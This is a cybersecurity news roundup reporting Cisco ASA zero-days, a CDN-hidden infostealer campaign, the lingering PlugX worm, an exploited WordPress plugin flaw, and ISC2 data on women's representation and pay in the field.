TLDR:
- Cisco ASA gateways have two zero-day vulnerabilities that are being exploited by a government-backed threat actor.
- A content delivery network is being used to deliver information-stealing malware to organizations around the world.
- A WordPress plugin vulnerability is being actively exploited by threat actors.
Network administrators with Cisco Systems’ ASA security appliance on their networks are urged to install the latest security patches due to two zero-day vulnerabilities being exploited. These attackers are likely government-backed threat actors with compromised devices first seen in January. The attack deposits a backdoor on ASA gateway devices with various capabilities. Additionally, a threat actor is hiding behind a CDN to deliver malware globally. In terms of WordPress, a vulnerable version of a plugin is being exploited by threat actors. Despite efforts to increase female participation in cybersecurity, the industry still sees a gender gap in both representation and salary.
Full Article:
Network administrators with Cisco Systems’ ASA security appliance on their networks are urged to install the latest security patches. This comes after the discovery of two zero-day vulnerabilities that are being exploited. Cisco says the attacker is likely a government-backed threat actor. Although compromised devices were first seen in January, attack activity may have started as early as last November. Cisco can’t say right now how devices were compromised. This attack deposits a backdoor on ASA gateway devices, which have combination firewall, antivirus, intrusion prevention, and virtual private network capabilities. Cisco also says network telemetry and information from intelligence partners indicate the actor is interested in — and potentially attacking — Microsoft Exchange servers and network devices from other vendors.
A threat actor is hiding behind the cache of a content delivery network to deliver information-stealing malware to organizations around the world. That’s according to researchers at Cisco’s Talos threat intelligence service. Firms hit so far are the U.S., the U.K., Germany, Norway, Poland, Japan and elsewhere. The researchers suspect the threat actor is a Vietnam-based group they call CoralRaider. It’s suspected employees are tricked by phishing emails into downloading and opening a malicious ZIP file that triggers infection. Inside the ZIP file is a shortcut file that starts a PowerShell command. It eventually downloads malware for vacuuming up credentials, cookies, credit card numbers and anything else it can find.
Last September researchers at Sekoia took over a command and control server distributing the worm version of the PlugX backdoor. The goal of the takeover was to sinkhole the distribution botnet — in other words, automated requests for the malware would disappear as if into a sinkhole. However, Sekoia said this week there are still tens of thousands of internet-connected devices trying to connect to the server every day. In other words, this worm can’t be completely stopped because it’s still replicating itself. Because Sekoia controls the distribution server it thinks it could issue a command to infected computers to delete PlugX, but there are legal implications. Deleting it from infected flash drives that spread it may be harder, especially if they aren’t plugged into a computer. Because infected USB keys and storage devices are still used to spread many types of malware Sekoia urges IT administrators to prevent any file from executing from a removable device, or set Windows to deny removable devices from being used by any employee.
Threat actors are actively exploiting unpatched installations of WordPress that use a vulnerable version of the WP Automatic plug-in. That’s according to researchers at WPScan. This plug-in allows the automated posting of content to any website. The hole in the plugin — a SQL injection flaw — was revealed weeks ago and a patch is available. Slow patchers are paying the price by seeing their WordPress accounts taken over.
Despite efforts of educators and job recruiters to boost the participation of women in cybersecurity, the number of females working in the sector hasn’t budged much. That’s one of the findings of a close look at data collected in the annual global cybersecurity workforce study by the ISC2. The full report was released in February, but the analysis of the survey responses of women was released this week. The number of women in the industry is estimated to be between 20 and 25 per cent. But there’s a higher representation among workers under the age of 44. On average, respondents said 23 per cent of their security teams are made up of women. However, 11 per cent of all survey participants said there were no women on their security teams. Twenty-one per cent of men surveyed couldn’t estimate how many women were on their security teams. By comparison 13 per cent of the women respondents said they couldn’t guess how many teammates were women. The salary gap between men and women still exists. On average it’s about $5,400. The report says there are several ways employers can help increase women’s participation in cybersecurity including setting hiring, recruitment and advance metrics in the organization, and making pay equity a priority.